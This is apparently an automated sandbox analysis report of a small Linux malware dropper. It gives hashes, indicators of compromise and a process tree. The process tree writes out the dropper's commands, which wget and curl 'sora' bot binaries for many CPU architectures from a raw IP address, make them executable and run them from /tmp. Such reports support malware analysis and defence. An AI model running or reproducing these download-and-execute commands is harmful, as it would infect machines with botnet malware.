Analysis
-
max time kernel
8s -
max time network
9s -
platform
debian-9_armhf -
resource
debian9-armhf-20240226-en -
resource tags
arch:armhfimage:debian9-armhf-20240226-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
28-03-2024 10:06
Static task
static1
Behavioral task
behavioral1
Sample
02ca1bec2de42845c35867af0dc72be3_JaffaCakes118
Resource
ubuntu1804-amd64-20240226-en
Behavioral task
behavioral2
Sample
02ca1bec2de42845c35867af0dc72be3_JaffaCakes118
Resource
debian9-armhf-20240226-en
Behavioral task
behavioral3
Sample
02ca1bec2de42845c35867af0dc72be3_JaffaCakes118
Resource
debian9-mipsbe-20240226-en
Behavioral task
behavioral4
Sample
02ca1bec2de42845c35867af0dc72be3_JaffaCakes118
Resource
debian9-mipsel-20240226-en
General
-
Target
02ca1bec2de42845c35867af0dc72be3_JaffaCakes118
-
Size
1KB
-
MD5
02ca1bec2de42845c35867af0dc72be3
-
SHA1
d2fc439476dd4ec34fce01257762a34b0aa6f3d5
-
SHA256
848e8eadd6296084ce9231181c15d333d453ff0a95f4163477265211839d4f54
-
SHA512
302e57020da9a74ee02c1f39c81aacb5a4385cedb7a0323ee3ba208d8e58fe5abdf83e2975bc8416ba684e164a512420b550f15569f3243f39a00d4cd99a3dc7
Malware Config
Signatures
-
Executes dropped EXE 10 IoCs
Processes:
robbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenioc pid process /tmp/robben 665 robben /tmp/robben 679 robben /tmp/robben 685 robben /tmp/robben 696 robben /tmp/robben 709 robben /tmp/robben 724 robben /tmp/robben 738 robben /tmp/robben 759 robben /tmp/robben 767 robben /tmp/robben 773 robben -
Checks CPU configuration 1 TTPs 10 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Reads runtime system information 20 IoCs
Reads data from /proc virtual filesystem.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
description ioc File opened for modification /tmp/robben
Processes
-
/tmp/02ca1bec2de42845c35867af0dc72be3_JaffaCakes118/tmp/02ca1bec2de42845c35867af0dc72be3_JaffaCakes1181⤵
-
/usr/bin/wgetwget http://188.127.235.211/bins/sora.x862⤵
-
/usr/bin/curlcurl -O http://188.127.235.211/bins/sora.x862⤵
- Checks CPU configuration
- Reads runtime system information
-
/bin/catcat sora.x862⤵
-
/bin/chmodchmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-99e08f791dec4ba2b75245122a43ebbe-systemd-timedated.service-bPorpe2⤵
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
-
/usr/bin/wgetwget http://188.127.235.211/bins/sora.mips2⤵
-
/usr/bin/curlcurl -O http://188.127.235.211/bins/sora.mips2⤵
- Checks CPU configuration
- Reads runtime system information
-
/bin/catcat sora.mips2⤵
-
/bin/chmodchmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-99e08f791dec4ba2b75245122a43ebbe-systemd-timedated.service-bPorpe2⤵
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
-
/usr/bin/wgetwget http://188.127.235.211/bins/sora.mpsl2⤵
-
/usr/bin/curlcurl -O http://188.127.235.211/bins/sora.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
-
/bin/catcat sora.mpsl2⤵
-
/bin/chmodchmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-99e08f791dec4ba2b75245122a43ebbe-systemd-timedated.service-bPorpe2⤵
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
-
/usr/bin/wgetwget http://188.127.235.211/bins/sora.arm42⤵
-
/usr/bin/curlcurl -O http://188.127.235.211/bins/sora.arm42⤵
- Checks CPU configuration
- Reads runtime system information
-
/bin/catcat sora.arm42⤵
-
/bin/chmodchmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-99e08f791dec4ba2b75245122a43ebbe-systemd-timedated.service-bPorpe2⤵
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
-
/usr/bin/wgetwget http://188.127.235.211/bins/sora.arm52⤵
-
/usr/bin/curlcurl -O http://188.127.235.211/bins/sora.arm52⤵
- Checks CPU configuration
- Reads runtime system information
-
/bin/catcat sora.arm52⤵
-
/bin/chmodchmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-99e08f791dec4ba2b75245122a43ebbe-systemd-timedated.service-bPorpe2⤵
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
-
/usr/bin/wgetwget http://188.127.235.211/bins/sora.arm62⤵
-
/usr/bin/curlcurl -O http://188.127.235.211/bins/sora.arm62⤵
- Checks CPU configuration
- Reads runtime system information
-
/bin/catcat sora.arm62⤵
-
/bin/chmodchmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-99e08f791dec4ba2b75245122a43ebbe-systemd-timedated.service-bPorpe2⤵
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
-
/usr/bin/wgetwget http://188.127.235.211/bins/sora.arm72⤵
-
/usr/bin/curlcurl -O http://188.127.235.211/bins/sora.arm72⤵
- Checks CPU configuration
- Reads runtime system information
-
/bin/catcat sora.arm72⤵
-
/bin/chmodchmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-99e08f791dec4ba2b75245122a43ebbe-systemd-timedated.service-bPorpe2⤵
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
-
/usr/bin/wgetwget http://188.127.235.211/bins/sora.ppc2⤵
-
/usr/bin/curlcurl -O http://188.127.235.211/bins/sora.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
-
/bin/catcat sora.ppc2⤵
-
/bin/chmodchmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-99e08f791dec4ba2b75245122a43ebbe-systemd-timedated.service-bPorpe2⤵
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
-
/usr/bin/wgetwget http://188.127.235.211/bins/sora.m68k2⤵
-
/usr/bin/curlcurl -O http://188.127.235.211/bins/sora.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
-
/bin/catcat sora.m68k2⤵
-
/bin/chmodchmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-99e08f791dec4ba2b75245122a43ebbe-systemd-timedated.service-bPorpe2⤵
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
-
/usr/bin/wgetwget http://188.127.235.211/bins/sora.sh42⤵
-
/usr/bin/curlcurl -O http://188.127.235.211/bins/sora.sh42⤵
- Checks CPU configuration
- Reads runtime system information
-
/bin/catcat sora.sh42⤵
-
/bin/chmodchmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-99e08f791dec4ba2b75245122a43ebbe-systemd-timedated.service-bPorpe2⤵
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/688-1-0xb675d000-0xb676e044-memory.dmp